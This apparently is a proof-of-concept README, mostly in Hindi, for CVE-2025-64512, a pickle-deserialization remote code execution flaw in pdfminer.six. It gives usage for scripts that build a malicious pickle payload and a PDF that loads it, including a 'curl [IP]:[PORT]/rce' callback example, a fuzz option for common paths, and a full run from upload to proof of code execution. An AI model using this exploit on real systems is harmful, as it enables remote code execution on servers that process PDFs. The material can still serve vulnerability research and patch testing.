
CVE-2025-64512: pdfminer.six pickle डिसेरिएलाइज़ेशन rce; .pickle.gz + कस्टम पेलोड के साथ pdf जनरेटर
CVE-2025-64512 pdfminer.six में मनमाना कोड निष्पादन निर्मित PDF इनपुट के माध्यम से PoC
% python3 mkpickle.py Usage: mkpickle.py [output] Ex: mkpickle.py 'curl [IP]:[PORT]/rce' evil.pickle.gz
% python3 mkpdf.py -h usage: mkpdf.py [-h] [-o OUTPUT] [-p PATH] [-f] [pickle_name]
एक PDF बनाएं जो pdfminer.six pickle को ट्रिगर करता है डीसीरियलाइज़ेशन (CVE-2025-64512)
स्थितीय तर्क: pickle_name Pickle फ़ाइल नाम बिना .pickle.gz (default: evil)
विकल्प: -h, --help यह सहायता संदेश दिखाएं और बाहर निकलें -o, --output OUTPUT आउटपुट PDF फ़ाइल नाम (default: exploit.pdf) -p, --path PATH कस्टम निरपेक्ष पथ pickle (बिना .pickle.gz के) -f, --fuzz सभी के लिए PDF जनरेट करें सामान्य निरपेक्ष पथ
python3 mkpickle.py 'touch /tmp/a' evil.pickle.gz [+] evil.pickle.gz (78 bytes) cmd: touch /tmp/a
(evil.pickle.gz को /var/www/html/files/evil.pickle.gz पर अपलोड करें)
python3 mkpdf.py -o ex-poc.pdf -p '/var/www/html/files' evil [+] ex-poc.pdf -> /var/www/html/files/evil.pickle.gz
(ex-poc.pdf को अपलोड करें और PDF प्रोसेसिंग के लिए ट्रिगर/प्रतीक्षा करें)
ls -l /tmp/a -rw-r--r-- 1 ... ... 0 Jul 19 12:39 a